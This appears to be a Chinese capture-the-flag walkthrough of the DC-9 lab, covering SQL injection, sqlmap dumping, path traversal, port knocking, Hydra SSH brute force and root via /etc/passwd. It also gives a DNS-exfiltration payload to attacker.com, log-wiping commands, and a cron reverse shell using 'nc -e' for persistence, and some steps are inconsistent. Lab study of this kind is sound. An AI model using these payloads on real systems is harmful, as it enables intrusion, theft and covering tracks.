DC-9靶场渗透实战:从SQL注入到SSH爆破的完整通关指南(附避坑技巧)
DC-9靶场渗透实战:从SQL注入到SSH爆破的完整通关指南(附避坑技巧)
在网络安全学习过程中,靶场渗透是提升实战能力的最佳途径之一。DC-9作为经典的渗透测试靶场,融合了SQL注入、SSH爆破、端口敲门服务等多个典型漏洞场景,是检验和提升渗透技能的绝佳平台。本文将带你从零开始,一步步攻克DC-9靶场,同时分享实战中容易踩坑的关键点。
1. 环境准备与信息收集
1.1 靶场环境搭建
首先需要下载DC-9靶机镜像并导入虚拟机环境。建议使用VMware Workstation或VirtualBox作为虚拟化平台,配置网络为NAT或桥接模式,确保攻击机(Kali Linux)与靶机在同一网络段。
注意:部分虚拟机平台可能需要手动调整网络适配器设置,若遇到连接问题,可尝试重启网络服务或检查防火墙规则。
1.2 基础信息收集
使用Nmap进行基础扫描是渗透测试的第一步。以下命令组合可全面获取靶机信息:
nmap -sV -O -T4 <靶机IP> -p-关键参数解析:
-sV:服务版本探测-O:操作系统识别-T4:加速扫描-p-:全端口扫描
扫描结果可能显示以下关键信息:
| 端口号 | 服务 | 状态 | 备注 |
|---|---|---|---|
| 80/tcp | http | open | Web应用入口 |
| 22/tcp | ssh | filtered | 可能受端口敲门服务保护 |
| 其他端口 | 未知服务 | closed | 需进一步验证 |
2. Web应用渗透:SQL注入实战
2.1 漏洞发现与验证
通过目录扫描工具(如dirsearch)可快速发现Web应用结构:
dirsearch -u http://<靶机IP> -e php,html -x 403,404 -t 50在搜索结果页面(如/results.php)尝试基础注入测试:
- 输入单引号
'观察是否报错 - 测试布尔逻辑:
1' AND 1=1--与1' AND 1=2-- - 验证时间盲注:
1' AND sleep(5)--
2.2 SQLMap高级利用
确认注入点后,使用SQLMap自动化利用:
# 获取当前数据库 sqlmap -u "http://<靶机IP>/results.php" --method=POST --data="search=1" --current-db --batch # 提取Staff数据库表数据 sqlmap -u "http://<靶机IP>/results.php" --method=POST --data="search=1" -D Staff -T Users --dump关键技巧:
- 使用
--level和--risk参数提高检测强度 --batch模式自动选择默认选项- 结合
--os-shell尝试获取系统权限
2.3 密码破解与后台登录
获取的密码哈希通常为MD5格式,可使用以下方法破解:
- 在线解密平台(如cmd5.com)
- Hashcat本地破解:
hashcat -m 0 -a 0 hash.txt rockyou.txt - 若为简单哈希,直接Google搜索可能快速得到结果
3. 权限提升:从Web到系统
3.1 任意文件读取漏洞利用
后台发现的文件上传功能可能存在路径遍历漏洞:
/addrecord.php?file=../../../../../etc/passwd通过此漏洞可获取系统关键信息:
/etc/passwd:用户账户信息/etc/shadow:密码哈希(需root权限)/etc/knockd.conf:端口敲门配置
3.2 端口敲门服务破解
当SSH端口显示为filtered状态时,可能是受端口敲门保护。从配置文件中获取敲门序列后:
for port in 7469 8475 9842; do nc -zv <靶机IP> $port; done验证SSH端口状态变化:
nmap -p 22 <靶机IP>4. SSH爆破实战技巧
4.1 高效字典构建
结合已获取信息创建精准字典:
用户名来源:
- Web应用后台显示的用户名
/etc/passwd中的普通用户- 常见默认账户(admin, root, test等)
密码策略:
# 密码生成示例 base_words = ["password", "admin", "welcome"] years = ["2023", "2022", "!"] combinations = [f"{word}{year}" for word in base_words for year in years]
4.2 Hydra高级爆破
使用Hydra进行智能爆破:
hydra -L users.txt -P passwords.txt -t 4 -vV <靶机IP> ssh关键参数优化:
-t:线程控制(避免触发防护)-vV:详细输出-f:首次成功即停止
4.3 爆破结果分析
成功登录后立即:
- 检查命令历史:
cat ~/.bash_history - 查找敏感文件:
find / -type f -name "*.txt" -o -name "*.sh" 2>/dev/null - 检查sudo权限:
sudo -l
5. 提权路径与技巧
5.1 敏感文件发现
在用户目录中发现的可疑脚本需要重点分析:
ls -la /opt/devstuff/dist/test file /opt/devstuff/dist/test/test5.2 Python脚本提权
分析有SUID权限的Python脚本:
#!/usr/bin/python import sys if len(sys.argv) != 3: print("Usage: python test.py read append") sys.exit(1) else: with open(sys.argv[1], "r") as f: output = f.read() with open(sys.argv[2], "a") as f: f.write(output)利用方法:
- 创建包含新root用户的临时文件
- 追加到/etc/passwd:
echo 'hack:$1$hack$XGQJZ8m9Jz/...:0:0::/root:/bin/bash' > /tmp/hack sudo ./test /tmp/hack /etc/passwd
5.3 密码哈希生成
使用OpenSSL生成符合Linux标准的密码哈希:
openssl passwd -1 -salt random123 mypassword输出示例:$1$random12$wHZJ5j6zL9YQ7bN8XcVWn0
6. 常见问题与解决方案
6.1 SQL注入无回显
解决方案:
- 尝试时间盲注:
' AND IF(ASCII(SUBSTRING(database(),1,1))=115,sleep(5),0)-- - 使用DNS外带:
' UNION SELECT load_file(concat('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\share\\'))--
6.2 SSH爆破失败优化
调整策略:
- 限制尝试频率:
hydra -L users.txt -P passwords.txt -t 2 -w 10 <靶机IP> ssh - 使用代理轮换
- 尝试密钥认证漏洞
6.3 提权脚本权限问题
遇到权限拒绝时:
- 检查SUID位:
find / -perm -4000 2>/dev/null - 查找可写目录:
find / -writable 2>/dev/null - 利用环境变量劫持
7. 渗透后的痕迹清理
7.1 日志清除
定位相关日志文件:
/var/log/auth.log:SSH登录记录/var/log/apache2/access.log:Web访问记录/var/log/syslog:系统综合日志
清理示例:
sed -i '/你的IP/d' /var/log/auth.log7.2 后门部署
常见持久化方法:
- 添加SSH密钥:
echo "公钥内容" >> ~/.ssh/authorized_keys - 创建定时任务:
(crontab -l 2>/dev/null; echo "*/5 * * * * nc -e /bin/sh 攻击机IP 4444") | crontab - - 修改系统服务
在DC-9靶场实战中,最关键的突破点往往在于对异常现象的深入分析。例如当发现SSH端口状态异常时,不应轻易放弃而应考虑端口敲门等隐蔽机制。实际渗透测试中,耐心和细致观察比工具的使用更重要。